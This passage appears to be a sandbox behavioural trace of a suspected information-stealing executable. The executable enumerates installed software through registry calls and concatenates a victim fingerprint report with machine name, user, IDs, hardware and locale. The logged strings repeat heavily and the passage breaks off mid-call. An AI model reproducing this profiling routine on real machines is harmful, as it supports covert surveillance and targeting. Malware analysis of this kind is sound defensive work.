4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 16.0.4266.1001\nMicrosoft InfoPath MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared MUI (English) 2016 16.0.4266.1001\nMicrosoft DCF MUI (English) 2016 16.0.4266.1001\nMicrosoft OneNote MUI (English) 2016 16.0.4266.1001\nMicrosoft Groove MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM MUI (English) 2016") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 16.0.4266.1001\nMicrosoft InfoPath MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared MUI (English) 2016 16.0.4266.1001\nMicrosoft DCF MUI (English) 2016 16.0.4266.1001\nMicrosoft OneNote MUI (English) 2016 16.0.4266.1001\nMicrosoft Groove MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM MUI (English) 2016" [0175.940] RegQueryValueExA (in: hKey=0x354, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x1987e8, lpData=0x197bd4, lpcbData=0x197fd4*=0x400 | out: lpType=0x1987e8*=0x1, lpData="16.0.4266.1001", lpcbData=0x197fd4*=0xf) returned 0x0 [0175.940] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 16.0.4266.1001\nMicrosoft InfoPath MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared MUI (English) 2016 16.0.4266.1001\nMicrosoft DCF MUI (English) 2016 16.0.4266.1001\nMicrosoft OneNote MUI (English) 2016 16.0.4266.1001\nMicrosoft Groove MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM MUI (English) 2016", lpString2=" " | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 16.0.4266.1001\nMicrosoft InfoPath MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared MUI (English) 2016 16.0.4266.1001\nMicrosoft DCF MUI (English) 2016 16.0.4266.1001\nMicrosoft OneNote MUI (English) 2016 16.0.4266.1001\nMicrosoft Groove MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM MUI (English) 2016 ") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 16.0.4266.1001\nMicrosoft InfoPath MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared MUI (English) 2016 16.0.4266.1001\nMicrosoft DCF MUI (English) 2016 16.0.4266.1001\nMicrosoft OneNote MUI (English) 2016 16.0.4266.1001\nMicrosoft Groove MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM MUI (English) 2016 " [0175.940] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 16.0.4266.1001\nMicrosoft InfoPath MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared MUI (English) 2016 16.0.4266.1001\nMicrosoft DCF MUI (English) 2016 16.0.4266.1001\nMicrosoft OneNote MUI (English) 2016 16.0.4266.1001\nMicrosoft Groove MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM MUI (English) 2016 ", lpString2="16.0.4266.1001" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 16.0.4266.1001\nMicrosoft InfoPath MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared MUI (English) 2016 16.0.4266.1001\nMicrosoft DCF MUI (English) 2016 16.0.4266.1001\nMicrosoft OneNote MUI (English) 2016 16.0.4266.1001\nMicrosoft Groove MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM MUI (English) 2016 16.0.4266.1001") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 16.0.4266.1001\nMicrosoft InfoPath MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared MUI (English) 2016 16.0.4266.1001\nMicrosoft DCF MUI (English) 2016 16.0.4266.1001\nMicrosoft OneNote MUI (English) 2016 16.0.4266.1001\nMicrosoft Groove MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM MUI (English) 2016 16.0.4266.1001" [0175.940] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 16.0.4266.1001\nMicrosoft InfoPath MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared MUI (English) 2016 16.0.4266.1001\nMicrosoft DCF MUI (English) 2016 16.0.4266.1001\nMicrosoft OneNote MUI (English) 2016 16.0.4266.1001\nMicrosoft Groove MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM MUI (English) 2016 16.0.4266.1001", lpString2="\n" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 16.0.4266.1001\nMicrosoft InfoPath MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared MUI (English) 2016 16.0.4266.1001\nMicrosoft DCF MUI (English) 2016 16.0.4266.1001\nMicrosoft OneNote MUI (English) 2016 16.0.4266.1001\nMicrosoft Groove MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM MUI (English) 2016 16.0.4266.1001\n") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 16.0.4266.1001\nMicrosoft InfoPath MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared MUI (English) 2016 16.0.4266.1001\nMicrosoft DCF MUI (English) 2016 16.0.4266.1001\nMicrosoft OneNote MUI (English) 2016 16.0.4266.1001\nMicrosoft Groove MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM MUI (English) 2016 16.0.4266.1001\n" [0175.940] RegCloseKey (hKey=0x354) returned 0x0 [0175.940] RegEnumKeyExA (in: hKey=0x358, dwIndex=0x30, lpName=0x1983e4, lpcchName=0x197fd4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{90160000-00E2-0409-0000-0000000FF1CE}", lpcchName=0x197fd4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0175.941] wsprintfA (in: param_1=0x197fe4, param_2="%s\\%s" | out: param_1="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{90160000-00E2-0409-0000-0000000FF1CE}") returned 90 [0175.941] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{90160000-00E2-0409-0000-0000000FF1CE}", ulOptions=0x0, samDesired=0x20019, phkResult=0x197fe0 | out: phkResult=0x197fe0*=0x354) returned 0x0 [0175.941] RegQueryValueExA (in: hKey=0x354, lpValueName="DisplayName", lpReserved=0x0, lpType=0x1987e8, lpData=0x197bd4, lpcbData=0x197fd4*=0x400 | out: lpType=0x1987e8*=0x1, lpData="Microsoft Office OSM UX MUI (English) 2016", lpcbData=0x197fd4*=0x2b) returned 0x0 [0175.941] lstrlenA (lpString="Microsoft Office OSM UX MUI (English) 2016") returned 42 [0175.941] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: 